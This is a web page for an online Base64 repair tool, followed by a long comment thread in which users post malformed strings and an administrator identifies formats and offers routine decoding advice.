A virtual teacher who reveals to you the great secrets of Base64

Repair Base64

Quite often, users cannot decode Base64, because they got a malformed or invalid string. For example, this can happen if the source outputs an unexpected Base64 standard, the user copied unnecessary data, or something damaged the Base64 value. As a rule, such strings cannot be decoded without additional processing or human intervention, and because of this some inexperienced users mistakenly think that these strings are not decodable. Therefore, to help you decoding the undecodable, I developed a “repair tool” powered by some kind of magic, which is able to fix malformed Base64 and even inform you about detected errors. Of course, don’t wait for miracle, but don’t be surprised if it happens.


Please note that the repair tool may return many false positives and you should manually tidy up the results. If you get some weird results, please don’t judge me harshly. This tool can repair hundreds formats of poorly formatted Base64 values and in some cases it’s necessary to sacrifice accuracy in order to achieve good results. If you got wrong results, please send me your string and I’ll try to improve this tool.

Comments (364)

I hope you enjoy this discussion. In any case, I ask you to join it.

  • Jim,
    I did not notice a backslash and it drove me crazy while trying to insert a data URL. Your tool really saved my day :)
    • Michelle,
      Ready to talk yet?
    • Drea,
      I got this from my phone I been trying to decide this but I'm horrible at it lol some help ya girl outt
  • Youbze,
    Hi !

    That's about 0a2a-67c5-7a30-a153-b88f-81ac-8898-b766

    Got this one from a hidden value in a website, doesn't look like text, and it's IMO too short to be audio or video

    Maybe just used for binary validation of some sort...

    If you have an idea... :)

    BTW excellent work here :D
    • Administrator,
      Hi! Your string is a valid Base64 value (except the backslash), so it's almost impossible to tell what the data is. Well, at least, it is not a known popular binary format. I guess it may be a result of RSA encryption using a 512 bit key, but in fact it could be anything.
      • 82828,
        Hi sir... I have a ico file which is encrypted and I want to decide it can you help me.
        • Diicorp95,
          Do it yourself at https://base64.guru/converter/encode/image/ico
        • Finding-out79,
          PHOTO;ENCODING=BASE64;JPEG:/9j/4AAQSkZJRgABAQAAAQABAAD/4gIoSUNDX1BST0ZJTEU
      • Leoaja,
        ID : 9523-1cdf-d615-83a5-f619-1e04-5b46-7fac
        Hi I don't know if that means base64 or not probably not what I'm confused about here is the symbol. You can infer or change the symbol (protobuf) into text yeah that's ridiculous ... it's only because of one symbol that I am confused for hours because I'm just a beginner
      • vaishali,
        Hello Admin,
        I would like to decode a base64 code but I cannot post the code here due to privacy reasons. I have tried all the methods listed on your website but couldn't come any closer to decoding it. Could you reach out to me via the email address that I have provided? Your help would mean a lot to us.
        Regards.
      • hiddenmitsirugi,
        Hello admin! I am trying to decode the ones below using your great tools. However,I am not sure if these are Base64. Please, please help me with this?. Thank you.

        $2Fz,~;8SwTV>nd!@&"=/#<@[7TfPSH)R_&apos;/UwmFZG$
        $2ex*T-&apos;74{Hy7;}-V++qFdY|<&zDPl&z1"XO(&Ob$$
        • artemis37,
          &apos signifie apostrophe en html
          je suppose que le $` signifie variable
      • Jeannie,
        I need to knw what it is. My future depends on it. I think the last 20 yrs of my life have been a lie and I don't want to waste 20 more please help me decode some things
    • Natalie,
      So honestly a woman sent this to my fiancé. I asked her what it was and she said bitcoin.
  • Mlne,
    Hi I have a bunch of saved files in my Android & am unable to figure out a few of them.

    Thanks for your help
    • Administrator,
      Hello. It seems the submitted file is a Windows executable (exe).
      • OctaYT,
        Yes, Neither Andriod nor iOS can open exe
  • EDUARD,
    hello Eduard here again,..... Im sorry I forgot the Error ID: 379c-c7ff-f4fd-36d8-b158-ecb0-b301-3238

    how do enter the base64 code into a html page do i use a <html> tag then base64 uri like this <src="data:text/html;base64,PCFkb2N0eXBlIGh0bWw+D.........end it with" /> </html> or how ??? please advise ... thank you in advance for the prompt reply!!! Ed
    • Administrator,
      Hello Eduard,
      You need a valid opening tag that supports HTML embedding (src is just an attribute). So, to embed a Base64 encoded HTML into a web page you can use iframe, embed, or object.

      For example, in your case, the code should look something like this:
      <iframe src="data:text/html;base64,PCFkb2N0e..."></iframe>
  • Eduard,
    Please one more question ,... Ive been having to base64 all my media jpgs when sending phpmail from my server or the pictures dont get sent.

    What I wanted to accomplish is to base64 the whole completed html phpmail page and send it all as base64 .. is that possible with some other type of tag the <iframe> tag doesent seem to work... mail servers dont seem to see the <iframe> tag just like the CSS must be sent inline within the html for it to work.. please be so kind to advise... thank you in advance for you expert reply!!
    • Administrator,
      I do not think that mail services will support such messages (they will strip invalid content and/or mark messages as spam). Therefore, I recommend you to send HTML messages in the usual way (for example, using "Content-Transfer-Encoding: base64").
  • raceanud,
    Hello! ID: 360d-5afa-a8af-096c-44dc-2edb-2e0e-8018

    The text i recieved it is from an application in c#.When i get this text which i think it is base64 and i try to create a pdf file. the file it is created but it is shows a white page.
    • Administrator,
      Hello,
      Your string is not a Base64 value. It is just a binary source of your PDF file.
  • JasonMazzole,
    It was in my Google Drive

    36d6-c71f-0d93-8206-a73c-768a-dc2d-25db
    • Administrator,
      It is an SVG image that draws a white checkmark. If you want to preview it, use the Base64 to image decoder. Please note that you must copy-paste the valid Base64 string extracted by the repair tool. Also, you have to click the "Toggle Background Color" while previewing the image.
  • Sarraf,
    Hi this is about 227f-db23-6b41-37f2-90ca-e7d9-e3b4-2b48

    I got this one from a hidden part of a website.
    • Administrator,
      Hi! Your string is a data URI that contains a valid Base64 value. It’s hard to say what it is used for (especially that it should be used as a PNG, but it definitely isn’t an image).
  • base64,
    Thank you for this page
  • Saucy,
    I’m trying to figure out wat this is can you please help me it is important

    1287-3a17-3c38-112e-6c7a-ddaf-863d-9c00
    • Administrator,
      Hi! Most likely it is an Excel formula.
  • Zachary,
    f480-59bc-e9c2-78e3-fa89-3fc1-cb4c-b8ba

    This is my undecodable ID^, even with the repair tool it did not work. It was received from a weird header nikto found on a webpage.
    • Administrator,
      Hi! There are four different Base64 values and the repair tool detects them all. The problem is that all values store some unknown binary data. I do not know what they are used for, but I believe that this is something related to hashing or encryption functions. Maybe the name of the header indicates something?
  • Mike,
    Hey, you're a saint for this site.

    I have the error ID: 6da3-f4cd-b1a3-8653-101c-2582-7a63-c344

    I'm totally clueless, so would help getting an audio file from this! All best.
    • Administrator,
      Hello Mike,
      You have to extract the full data URI from your HTML file (it is included between two quotation marks src="..."). Then you can obtain the audio file using the Base64 to Audio decoder.
  • ChristinaTaylor,
    I'm very grateful for the help! I know nothing about this and I am still getting things done!
    : 0a78-5b9c-6c7d-8dc2-9dd2-835d-0a11-2a3a My last phone and new one did content transfer
    Thanks so much
    • Administrator,
      Hello Christina!
      I'm sorry for delay. Unfortunately, your string is neither a Base64 string nor any data format known to me. I recommend asking users on specialized smartphone forums and tell them some basic info about the file (name, size, location).
  • hadi,
    my id:

    b712-dd3a-fe6b-a277-f793-722f-d19a-a7f3

    thank you
    • Administrator,
      Hello,
      Your string is part of an HTML page that contains several audio files and images embedded via data URI. The Repair Tool is able to extract all valid Base64 strings and this is why I'm confused because of your comment. Could you explain please what the problem is?
      • Had,
        The issue is this is a big code that includes other than these files, it includes a java code that runs a program, this is what I am not able to decode
  • Jess,
    From a Instagram account someone made under my name

    [UPDATED: ]
    Sorry I forgot "376a-5491-5e8e-3166-a8e0-03f8-26f2-0537"
    • Administrator,
      As the Repair Tool says, your string is a SVG image. Well, it misses the open tag, but by adding it you can find found out that the image represents the Instagram logo.
      • Jess,
        Wow i wasn't expecting a response at allll ! I soo appreciate you! I should have sent you a different part of the page. Im trying to figure out a email in the source code of the url to see if I could find out who hacked my instagram, considering customer service wont do shit lol thank you for responding though,
        • Administrator,
          I'm happy I made your day a little bit more better :)
  • Vicky,
    Please help me to decode this file and I want to download the video. This is a porn video. And I want to download it.

    Id: 5097-2caa-af2b-54a5-7932-3753-9149-c761
  • combatmonk,
    a9a6-a35f-9b28-0777-b7a4-e758-0df9-2dff

    I have a series of JSON files that I am getting from an API. They use this format and I want to know why it has the \, the carriage return and padding issues. Or most importantly how I can include a script to repair them for my project. I will have anywhere from 0-n items which I will iterate through, transform and display as a modal with text or something. Thanks for your help and generosity!

    CM
    • combatmonk,
      Sorry for the silly question, but it appears that this is just a "\n" newline character that I can write a function to remove. Do you happen to know if this is a convention when base64 encoding a jpg?

      Thanks Again!

      CM
      • Administrator,
        Hi! Typically, a Base64 string depends on the Base64 standard, not the input (i.e., the JPG file will return the same characters set as the TXT file). In your case, it complies with RFC 2045 (that is, the output is splitted into fixed 76 line-length). So, newlines are mandatory and you should be able to decode the Base64 string without any problems. However, something is wrong here, because your string doesn't contains "real newlines" (it contains a backslash followed by the letter "n"). Since you are extracting Base64 from JSON, I suppose the problem is that you forgot to decode JSON before extracting Base64 (the secret is that when decoding JSON the "\n" will be converted to a proper newline).
  • Savan,
    Hello,

    its about 3941-c524-8765-3459-0127-599c-40bc-b617

    i have found this in a website and couldn't get rid of it,

    really appreciate your efforts for people,

    i will be very thankful to you if you could help me to decode it.

    Thanks
    • Administrator,
      Hello Savan,
      Sorry for delay. Also, I' sorry for bad news, but your string is not Base64 encoded.
  • christy,
    id: 31cb-afbc-ed23-93e1-54fa-3033-6ee4-e367

    thank you for your assistance!
  • Zaxx,
    Hello sir ..ID 42d7-9d22-c143-ff32-d306-7762-5d87-817b can u please help me to decode this base64 script..TQ
    • Administrator,
      Hello,
      Your string is a .woff font file (Web Open Font Format). You can decode your Base64 string the Base64 to File decoder.
  • Abhishek_Gangwar,
    c091-dd08-a999-6a98-1c1a-2ec7-f247-40e2 please solve
    • Administrator,
      Hello,
      Your Base64 string is a corrupted PNG image. I'm sorry, but I don't think you can repair it.
  • Mike,
    I don't know where this came from or what it is. Named as an RSI receipt but don't know RSI & it has 29 pages of this script. I like your dedication to helping those in need. I appreciate any help you can provide to me.Thnx

    boundary_1238_451212eb-68fa-4102-8bed-4bad29aa1982
    Content-Type: application/octet-stream; name="Invoice RSI125851466.pdf"
    Content-Transfer-Encoding: base64
    JVBERi0xLjMKJSBJbnZvaWNlIFJTSTEyNTg1MTQ2NiAtIFJlcG9ydAolIEdlbmVyYXRlZCBi
    ...
    LixkK0lGOmkrUmdObytcM2MhK2VeKCkrbzxIMiwjb2g9LC1OM0gsNzVZVCxBJjBiLEprXHAs


    Sorry I'm a tech neanderthal. This is page 1 of 29. I tried to send the file but it won't let me or I be an idiot.
    • Administrator,
      Hello Mike,
      It seems to be an email attachment that contains a PDF file. It cannot be decoded properly, because you provided only first bytes of your Base64 string. However, if you do not know where it comes from, I highly recommend not trying to open it, because it may be a phishing message or even worse, it may contain security exploits.
  • mohamed,
    hi

    please help me with the code 5b48-752d-fd82-de4d-a1d3-287c-e394-0ddb

    it wordpress functions file
    • Administrator,
      Hello,
      Your submission is a valid Base64 string. Unfortunately, it contains data unknown to me. Perhaps, it may contain the result of a cryptographic function. Therefore, to decrypt it, you need to know the passphrase and algorithm.

      In any case, if this file is from an unknown source, I strongly do not recommend running or including it in PHP, because it may be a backdoor.
      • mohamed,
        thanks for replying

        i appreciate it.
  • kunde91,
    Hello ..ID 72b9-aabc-0d8a-bd5a-b97c-ad8e-e130-9c20

    mfg
    • Administrator,
      Hello. Sorry for being late. Unfortunately, your string cannot be decoded because it is saved in wrong charset encoding.
  • srikanth,
    Hello sir,

    I have a base64 encoded binary format zip file which I would like to unzip and download please could you help.iam pasting bit of the file due to limitations.

    file

    PK        Q 'P;h•B«ò  ã%  $   CNMD008636024_79763540_1_1_MF118.xml“Â]ð’¹î%…~þ„  ÀàÒó··Ð È  êZÜ ´­uÄò¤O ¾>¬ `K I‚5À~2IVm‘œ·bd2¶"O‘ .Ñ[ø ”«ZóóóXΝ耒?€…èO‚‚ð?}ˆ¼ˆˆ Ç×_|„?ØÁ€èÀ„ºÀ‚ƒÀ †_ƒÈ_‚À€°/ˆÐ ‚ƒŒÈ €Ž‚š¨…ˆ‡ì‡/~€¬Š˜…Ä_ƒ†˜à€Š…–Ø€Ž €q†ŒÈ –’„OàÁ‚†¤Ø‡sƒ°~„œ}…¦ ‚”  €ÀŠ‚OÀ灲€ƒ–ÄÄŒ?‹šø €šST >‚€À…²?ƒŽ°€…’ĐÁ€ixkƒÈ~…‘…‚ À‚‰Ð…¨o€‡~ƒŒ ƒ¸o
  • Jamie,
    I found this and cant seem to see what it is, only my 21 son uses my account sometimes I just need to see or know what it is please. And thank you.
  • molly,
    5540-c429-54e5-d52b-19c4-ffe5-70b0-45e6
  • DavidAArteaga,
    It works like a charm ?: d0d9-d9e5-53c6-6191-16b0-139d-e9e1-ac3e, found the mal. ali. On an A.P.I. site. Probably got there through embedding. Everyone who encounter these probably have it attached to their profile and leave a piece of it behind while crawling the web. But I've only been doing independent studying, Without any.. body around that know a whole lot about it. If Im wrong I'd like to know.
  • Rob,
    Going through hidden files trying to diagnose if there is hidden redirection
  • twyla,
    Thanks so very much

    [UPDATED: ]
    Great web site
  • pasupathi,
    88a0-7361-5cee-fad5-8204-8552-d6cb-1fd6 thank you after checked repaired id i will get back you
    • Administrator,
      The Repair Tool is able to normalize your string. So, copy the repaired string and decode it using the Base64 to Image decoder.
  • itay,
    Just wanted to say that you saved me after i was about to bash my head against the wall, thanks mate
  • ashah,
    ID: f683-c7bb-d1a8-301c-2e61-f58e-04ef-ce94

    Decode fails with
    Caused by: com.rsa.jsafe.JSAFE_PaddingException: Could not perform unpadding: invalid pad byte.
    at com.rsa.cryptoj.p.hl.a(Unknown Source) ~[jsafe-4.0.jar:4.0]
    • Administrator,
      Your Base64 string contains some invalid characters. So, just remove {CBC} to fix it.
  • pancake888,
    I actually got the string from a flash game and trying to figure out what it is saying fully, if that does make sense
    • pancake888,
      i forgot to add 548f-f903-543c-a4ce-341c-1219-dd96-0769
  • Veizx,
    f088-755d-9482-eaf4-d06b-07d8-3117-7e91

    Thanks your for your work :)
    • Veizx,
      Forgot to say that i want to encode a PDF file to send it via post with php, when converting the b64 to pdf it gets corrupted.
  • Chris,
    Greate!!! your tool is working fine for me, i tested a bad generate code base64 for a database image that save, but i really need to implement on my software solution made it on php and can't do it trought the code !!!!!!
    • Chris,
      I forget to say that the error that I get is • Fixed incorrect padding. so I try to implement your solution apliying strtr($data, '-_', '+/') and strtr($b64, '+/', '-_') but when I comparing on text editor the bad value whit the good one, I just find that at the end exist one more "i" on the bad value, please can you help me to find a good solution. thanksss!!
      • Chris,
        No worries!!! Finally I fixed, the error was the value has incorrect extra data and dont have "=" character, the extra "i" character has been assumed as padding, so, just I taked the base64 value and I divided for 8 and test if was multiple of 8 and finally rest the residue for fix the value size, thanks for you information your page was so usefull for find my solution, bye!!!
  • Jessica,
    I cant decode this it's saying it's a text 5aa8-ed40-0a7f-64ec-9493-15d7-647c-d439 help me please thanks
    • Administrator,
      Hey Jessica! Your string is a JSON that contains info about some currencies and precious metals.
  • Syed,
    9134-df7d-3d40-fe45-875b-b3c0-def7-5853

    cannot figure out what format it is if this is not the right one

    thanks
    • Administrator,
      Hey Syed! That's some binary data and I don't know what kind of data it is.
  • Felix,
    ID: b413-bfa3-f53f-ed77-be7c-b314-664a-83fe

    Thx!
    • Administrator,
      Hello Felix! This is a SVG image. To view it, just copy-paste it into your browser address bar and press Enter ;)
  • Thaddeus,
    Hello,

    ID: ``754d-334b-2af8-bc58-0621-a76b-663d-ee17``

    I created an LSTM trained on base64 from preselected images to write new base64 strings, curious if you can give me any insight on what errors are present and what sort of feedback you can give me to adjust the learning model to accurately recreate base64.
    • Administrator,
      Hey Thaddeus! You cannot concatenate Base64 values like this (just by joining multiple Base64 values). You must concatenate binary data first and only after that you should encode the result to Base64.
  • Bobby,
    a4c7-9384-6cc5-3bc6-14a9-966c-2cb2-64a3
    Hello there..I found this base 64 code in the phone, my partner gave to me. Any info would be much appreciated.
    Thank you
    Bobby
    • Administrator,
      Hello Bobby! This is just a regular HTML page that have some background images included via Data URI.
  • Much,
    a833-60b0-d0f0-0a01-cb0b-bdfe-8a5b-c4bf
    please help me decode this, am on a hacker challenge with my friends. i would also love it if you describe how you decoded it.
    • Administrator,
      Your string is not a Base64 value. Perhaps you should play with its encoding and ASCII table.
  • Qwertyuiop,
    i am a user of tcrf, and i need help doing this. I s u c k at BaseX, and i tried to convert these two zip files from base64, but WinRAR says "! C:\Users\korbi\Downloads\application.zip: Checksum error in C:\Users\korbi\Downloads\application\NO$GMB.EXE. The file is corrupt
    ! C:\Users\korbi\Downloads\application.zip: The archive is corrupt
    "
     the intirety of the code is fragmented, but its in https://tcrf.net/MTV_Sports:_T.J._Lavin%27s_Ultimate_BMX_(Game_Boy_Color) 
  • Lybdetderrt,
    I am clueless when it comes to opening files. I have been trying everything to open these hidden files my husband left on my phone.
  • AlJones,
    Reference code: ‘807d-6efd-ce9a-d723-5f82-02ea-f520-35e2’
    Found in my sent folder and can’t decipher it. Please help.

    Thanks,
    Al Jones
    • Administrator,
      Perhaps it is supposed to be a JPEG image, but many characters were discarded since it was sent as plain text.
  • Kunj,
    3c56-b817-a13c-5faa-9774-b6f2-6e28-46ef

    I got it from a p7m file.
  • Matthew,
    6cfe-bb0d-7e53-055d-7441-fa3f-825c-9d2e

    Found from an ARG based on an old TV show. It seems that the top is valid Base64 and the footer is also valid. I was able to figure out what the footer said by decoding from B64 to ISO-2022-JP, but for the top it seems to just spit out garbage. Would definitely appreciate some help!
    • Administrator,
      Hello Matthew,
      Indeed, the bottom string is a Base64 value, but I can’t say the same about the first one. At least (if it is ISO-2022-JP) this is strange to me that a such long string does not have any special characters (like “/” or “+”). Also, the “formatting” is somehow special (I mean, the number of lines, slashes, and characters per line).

      The only thing I know for sure is that to complete such challenges you need to be in the loop, since quite often the details are part of the key.
  • Sandy,
    ID: 9f77-73ee-bfef-a7a0-1a7b-e4f4-1935-4599
    Hola buenos dias tengo es codificación porque no puedo iniciar sesión en mi cuenta de google muchas gracias esperó su ayuda
  • Jack,
    ID: ad63-1aae-2ca8-da08-d093-7b11-2604-ca68
    My friend sent me this, none of us can solve it.
  • Joseph,
    It's a code I bought then, I will to make some modifications.

    ID: 52c1-345f-1bca-39c9-0d69-ef46-5698-7825
  • fabio,
    76f9-b061-b828-01db-860d-21d3-d02c-ab3f
  • Evan,
    I have a code that is like 1,000,000 characters long. The page doesn't respond so I just refresh. I can't try to fix it myself because it just glitches my computer out.
  • Martina,
    I have just got this file from my spouse files and bc he's been acting unsual latly and this file is in knownen I want to see what it is.
  • CR_Banzarey,
    Id- a7aa-3f2d-6da3-84f2-e06b-4f9d-7c63-ff54
    Please decode the following-
    UBREG vfWhtcmSwMVBpATqNI/0ieSjn1zN7RQiP/sECHw6UDQU3UCtwBGpxsW+Kyxagh3kgaJt8zJIkOO8GEKjfODfQ==
  • GovindSIngh,
    Please share solution for this response so i can create pdf from this response

    [UPDATED: ]
    ID:735b-229a-6345-5d0c-71d0-f0fe-c2ee-b646
  • Liz,
    I got this message from a streamer that needs help trying to decrypt this message, apparently it's base64 but I don't know what it could mean.
    V0sXTWb4NFg7GndTo1Sbkkwm E̶N̶C̶R̶Y̶P̶T̶E̶D̶ ANHSJpKyjD2sVyPHxFI=
  • RubyGirl,
    I built a program that encrypts stuff but I can't decrypt it please help!

    gAAAAABe9jNFemWEdfMxGhT0sCJcPXxzbNI703eoFrW-VHvCx0IVt2B3b_2DvtD0cxiiMrrsmqYwIZxwUvN3O27hBP7K1TvRdfix4llgP9z6gts3dbRPxCXOSDETSlARre8E_urq2wtxfdi65JwkkXkJ087Pw9VKLKTACtz7we7E_yeYBWgkrdfK4NrZkFFpyFx7H-WgCAaH3vP3FI_fLRP0-xmtuGU5JvQ7T2CyWZImjFJsdIJSOMmn5OvT3WMRKbIj8pgF7dUgyh6Lfsfd8zkxtBRrNH99AXQsHw6sCJFXtrWnPfqcGCVM8mueMvIhIP35ES_mt7BdLOoiSOqSceQvpl_mL-89NDL5Fgd_-Pe6ZEhyKNCWxzwKvgDxib1uTAaMAeQq4xoDxFCftMYo6jSZ1sO-PZksFTW5AvIrwKZk8JVivteNmTxDZ0NjwxhiJnTsTvLpT9WHSAitZZLtK9QtOYQcfB6FApDXCvHqAMsonIB_w4EjPHTatuysckjQocHMUF8LndsSmmrTDXb6-WUoXf2pBeHzmvLQAzMM0Vg6Q74CgGFc2Tfu1VrpTas8NtrMNyUuNB9eKn39GNNWApchxbUOvENvLsMXZ7YC-LK6G98qF0tD1p-p5LXggWTfH3M_mJrOWgp4DvDMz4UyBPn1ww2kfBQqQePWKdt3Zlvp4nlKi4OmkbrUK0gpLKBUqjM0Nmtw9C0uP87hTdJqkpemxhhm6ROKdd39qRe46qGODZNLESKTbflel7CKvdmdF3UXWHUK-xMPagFlbSYzDEyOl7wVHyZHL9ULN9NjTDWbhOrVjq4KJ56c7tPglOH5T0dBOpxQHw-7TlAC-yh7OEAm-R9sPDxjKu_xvkzSMZRRPQ8fOcPz3OrXEupyDfMJUSgVBOT6_GAZD8hhpHBvXwdG_OwSyu933JrylQojilF01Iiat04sl1Y=WZ6tLJiZtG15tqsJPB3o6h6S0bN_ysiYwwmDkga9STMSa0xI_TwGrTiCeFOs0L1ICnTVflOteX6pRM92v17UY1TRyiR0r8zRecUX0f3tbFzWgvGtcH5H4uVZLhEgnulpY1J5p9NuI0VnCzYMDzU2jW6RsR-8Ga5iZ55qtv72jgnnq8AaIXMCR9_hr4RBRxmtcD7DfJ-zrfXQf6eorxkr7E--iFlAkjCxf17XFX2zmmnWdVKlxXFYkGNHOfMxcgkD-M4SEOLP4aw_DF008CCGlzhHQI84bSVdsi_0FJplFEpUmU64gm048IXac609zqZ3j2Zr7rGQrMOZdKVMyJ-BDwdT0SbGozCvozE1kb1C2mxlEeo_pqxmYckOAdtCJEfumJdqnF8QrWrSS2i8UyMB
    • Administrator,
      Be aware that you provided two Base64URL strings.
  • Jim,
    If you can figure out what kind of psycho mix of binary this is then please be my guest. Also might contain Unicode?

    d229-addb-8b5a-59ba-6f81-e747-1f3e-b855
  • Anirudh,
    Is there any Javascript function to repair the base64 string?
  • Rafael,
    I got this from a PDF file in the database from my website
    c6b7-2e48-9b0b-fd4a-600c-0a3d-7ce5-b25d
  • Jason,
    Its about 2bd2-e94d-41b0-e9e9-cbdf-78e1-9f4d-352a

    An android app dumped the file and I wanna know what's inside
  • Layla,
    This was received by my lawyer on a letter concerning my son who passed.
  • Jose,
    hey so i got this from an image, is a challenge developed by a cibersecurity research group, but i think something is wrong with it
    ID: e391-bdc3-8e18-bd8a-d9c3-af9a-65cf-1639
  • Nguyen,
    a10a-2e80-4d89-78a4-a43d-4076-96d8-e02f
  • Umair,
    i am really struggling to display it as PDF in javascript, i am using the below code and doing the slicing to delete the start(data:application/pdf;base64,) from code but still getting error

    let generateFile = (content, fileName) => {

    let content1 = content.slice(29);
    const blob = new Blob([content1], { type: "application/pdf" });

        console.log(blob);
        const link = document.createElement("a");
        link.href = window.URL.createObjectURL(blob);
        link.download = fileName;
        link.click();
      }



    i have uploaded the content string at https://pastebin.com/W4zEXyPy

    any suggestions please
    • Umair,
      just to confirm the Code id here is: ID: f85a-22cd-f8c6-58fb-5e1f-e194-2665-d526
  • JJ75,
    6d16-f4fe-4b98-14e3-5171-552e-8066-6314

    Any help would be greatly appreciated. thank you for your time
  • kundudev,
    I got this string from a zoom meeting invite, it is the password string I guess.
    ID f043-6c68-38ef-11fb-7c80-023c-d5f9-ce85
  • JRuhl09,
    Got this from a reddit meme puzzle
    ID b870-7e52-de3d-6629-c31c-388f-b423-4576
  • Edgar,
    The best base64 decoder
  • Queensa,
    Hello Admin,

    ID: 5b5f-8f90-60bf-6507-eed8-97a3-1f27-5df0
    • Administrator,
      Hello! This is an obfuscated JavaScript snippet. Unfortunately, you cannot deobfuscate it using online tools.
  • jimk,
    Hi, I found this part of text in a professor's academic page, which all of his pages are encoded in the same way for some reason (I guess something misconfigured on their end).
    6e6a-5ab7-f891-67f3-7514-c117-cd5f-f2e3
    • Administrator,
      Hello! Yes, it seems to be a charset encoding misconfiguration or something related to missing fonts. However, this does not exclude the possibility that the problem is on your side (for example, your browser is not configured to automatically detect charset encoding or your OS has no some base fonts).
  • Timtuner,
    Reference to f9f3-0d82-f51f-76ef-d8c5-9056-a9ec-9f98

    Thx you
  • Sollevix,
    Hello,

    What is encoding type for this ID : c603-6d2f-5d3d-b25c-3de5-4214-9181-645b ?

    I can't decode using this website.

    Thanks.

    Sollevix

    Thanks for your help
  • niv,
    3445-dd72-63a2-2c6a-3065-c34e-ba2e-cec7
  • Bhushan,
    Nice Development option
  • Dario,
    Hi:
    This is a code I have had from long time ago and I was never able to decode. I don't really know what format it is. It is a picture and it should be about sport, but I don't know. As I said, I've never could decode it. I appreciate your help.
  • luis,
    280d-d0b4-1eb1-33eb-b4b0-a9af-e448-8a12

    Hola,
    tube ese codigo de una webservices de un proveedor, aparentemente es un PDF de un documento electronico.

    lo que necesito es interpretarlo para tener una previa en php
    • Administrator,
      Hi! Not sure what exactly you need, but keep in mind this is a corrupted PDF file.
  • Slee11,
    Hello,
    1822-7897-4be8-a055-7031-880f-ad50-81c.

    Got this from a possible secret chat.
  • dog-emem,
    1891322 1787212897762 47792131057245301
    Tried all I could to decode this string. Can you help?
  • Blushsard,
    Hello, I'm sorry to bother you but I'm asked to decode a file with base64 ( '''62d7-3799-846f-6a5f-213b-cac9-3322-04cc''') but there seems to be some errors in it. Is it possible to have the opinion of someone about it ?
    • Administrator,
      Hi! Your string contains three different Base64 values separated by "," and "dash". First one is an image, but the other two contain binary data unknown to me.
      • Blushsard,
        Thanks for your answer.
  • Tom,
    I obtained it from a back up of my log

    5362-1bcc-d8fb-49e1-4021-e109-81d4-5c50

    [UPDATED: ]
    I am trying to translate the messages in this source code back up.

    136c-3eae-fa1d-2c77-2f33-ee1d-492e-7dd1

    Thank you

    [UPDATED: ]
    Any way I can buy you a few beers to help me with this
    • Administrator,
      Hey Tom,
      The data you sent doesn't need to be decoded. It's just some source code in JavaScript and C.
      • Tom,
        How do I get the text from this message

        ***

        sending you a couple beers now
        • Administrator,
          I cannot access that URL because of "URL signature expired". Please contact me via email and describe your problem in detail.
  • Vidhu,
    So here is the ID fef2-b146-ea4e-7477-b5e9-7b6e-df34-a842

    The file is apparently a JS, and the Base64 string is present as an object. The converter says it to be Octet/Binary file, Which further leads me to a file With wrong encoding, Or simply diamond question marks. Any Idea on how to decode the file?

    BTW you are doing great work here.
  • Lona,
    I need help decoding this please uggcf://zrtn.am/***
    • Administrator,
      Your string is encrypted using ROT13, so you can easily decrypt it with an online tool.
      • Lona,
        What online tool please
        • Administrator,
          Search on Google for "decrypt ROT13 online".
          • Lona,
            Thank you soo muchhhh!!!!!!!
            • Administrator,
              The beer's on you ;)
  • Sadie,
    I have many documents that contain this code. I have been trying for months to decode and I keep hitting solid rock wall. Says Base64, compression..padding.

    I look forward to your analysis.
  • Sheehan,
    This is in my 11 year old daughters phone. I believe it is from the scumbag who has been cyberstalking myself and my wife for the past 6 months. Please deciode and I can act decisively. Thank you.
  • Jaymark,
    Do you have + and _ will turn to - and /

    I mean is reverse version

    Cause is so hard
    Example

    This is Fixed Version

    HaUNN6377+bjajam663ejdH/

    I want to turn that code with

    HaUNN6377-bjajam663ejdh_
  • MeE,
    8430-a399-8eba-10b0-3623-f630-dc38-a5e1

    Random URL..
  • Prashant,
    hello i found this telegram bot .. but i want to make it human readable .. help me plz
  • TheDarkAngel,
    I got this for a question and after decoding this this will become a youtube url
  • hhhhh,
    cool
    3aa2-af74-7204-8a71-795e-2234-d942-e56b
  • hiddenmitsirugi,
    ID: 5ac4-e9b7-781b-6a6c-e5c0-a410-49b7-6363

    Hello admin! I am trying to decode the ones below using your great tools. However,I am not sure if these are Base64. Please, please help me with this?. Thank you.

    $2Fz,~;8SwTV>nd!@&"=/#<@[7TfPSH)R_&apos;/UwmFZG$
    $2ex*T-&apos;74{Hy7;}-V++qFdY|<&zDPl&z1"XO(&Ob$$
  • Roses,
    0a31-4376-3456-6830-fb09-9b5b-780c-730a !
    Thank you for the help!
  • britneymanson,
    I did a file recovery on my laptop and found this file. I tried to decode it using the online tool but was unsuccessful. Please help me decipher this document. Thank you.
    4345-66f7-ce35-0acc-5abe-dc53-2b60-0acbu
  • Dylan,
    ID: 98e8-ae82-1f63-8e73-7ba9-74a1-ef0d-3e2f
    I have no idea what encoding this is, though I am not experienced in this field at all. Any advice would be appreciated.
  • Daniella,
    ID:7fd4-1af9-73a2-1338-4895-5da9-4606-ae1f
    this is some hidden data from a web page, i was able to decode the rest of data, returns numbers,

    this one i could not figure out. Thank you for any comment on this.
  • Edward,
    Can't get repaired.
    data:image/png,%89PNG%0D%0A%1A%0A%00%00%00%0DIHDR%00%00%00%10%00%00%00%10%08%02%00%00%00%90%91h6%00%00%00%19IDAT(%91c%0C%DD%10%C5%40%0A%60%22I%F5%A8%86Q%0DCJ%03%00dy%01%7F%0C%9F0%7D%00%00%00%00IEND%AEB%60%82
    • Daniella,
      this is an image
      go here , post your code
      codebeautify.org/base64-to-image-converter
  • C87,
    Just showed up on my device d273-i9d5-1ce9-0527-df69-655f-e3e8-ff15

    0�, *�H��
    ��0�10 +�0�� *�H��
    �����1��0
    �00
    4+0��0
    ���0

    #�0Q z0 P25602�a0Ma~��0 1.12.20.10 1.12.20.10�
    Production0Bg��aww�|��ԭv0���~��'2��1����p&�0com.crowdedroad.Sign02021-02-13T12:14:42Z02021-02-13T12:14:42Z02021-02-13T12:09:30Z0:2����Y$/V)OD�+��;�]ɪ^kP�V&2oށN0��ē�;c��0C;Dٱ��͖�k��[�0*���sX�W��#
    ��`G���"�l#F��dxBy�PS�R/�0����1��0��0��0��0��0��0��0��0�0�0�0��0��0�VF�c0� �E�O=�0�4500008188392070�4500008188392070�2021-02-13T12:14:42Z0�2021-02-13T12:14:42Z0�2021-02-20T12:14:42Z03�*(com.crowdedroad.Sign.export_trial_7_12_F��e0�|0�d��W�� �0
    *�H��
    �0��10 UUS10U

    Apple Inc.1,0*U#Apple Worldwide Developer Relations1D0BU;Apple Worldwide Developer Relations Certification Authority0
    151113021509Z
